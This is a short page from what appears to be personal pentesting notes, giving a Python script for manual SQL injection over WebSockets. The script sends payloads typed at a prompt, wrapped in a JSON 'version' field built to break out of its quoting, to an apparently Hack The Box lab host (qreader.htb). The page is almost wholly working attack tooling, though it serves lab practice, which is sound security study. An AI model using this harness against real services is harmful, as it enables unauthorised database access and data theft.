PwnSec Notes

WebSockets

Last updated 2 years ago

Manual SQLI Testing

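import os
import readline
import sys

import websocket  # provided by the websocket-client package
from rich.console import Console

HISTORY_FILE = "sqli.history"

# read_history_file() raises if the file is missing and append_history_file()
# requires an existing file, so create it on first run.
if not os.path.exists(HISTORY_FILE):
    open(HISTORY_FILE, "a").close()
readline.read_history_file(HISTORY_FILE)
readline.parse_and_bind("tab: complete")
r = Console()

r.print("[+] zSockets...\n", style="bold green")
# websocket.enableTrace(True)  # uncomment to dump the raw frames
ws = websocket.WebSocket()
# JSON template; PAYLOAD is replaced with the text typed at the prompt.
parameter = '{"version": "0\\\" PAYLOAD ;--"}'
try:
    while True:
        injection = input("(SQLI)>> ")
        # Persist only the line just entered; appending 100 entries on
        # every iteration filled the history file with duplicates.
        readline.append_history_file(1, HISTORY_FILE)
        # Connect after the prompt so the socket does not sit idle while typing.
        ws.connect("ws://ws.qreader.htb:5789/version")
        x = parameter.replace("PAYLOAD", injection)
        ws.send(x)
        # markup=False: print the response verbatim instead of letting rich
        # interpret bracketed text in it as style tags.
        r.print(ws.recv(), style="bold blue", markup=False)
        ws.close()
except (KeyboardInterrupt, EOFError):
    sys.exit(0)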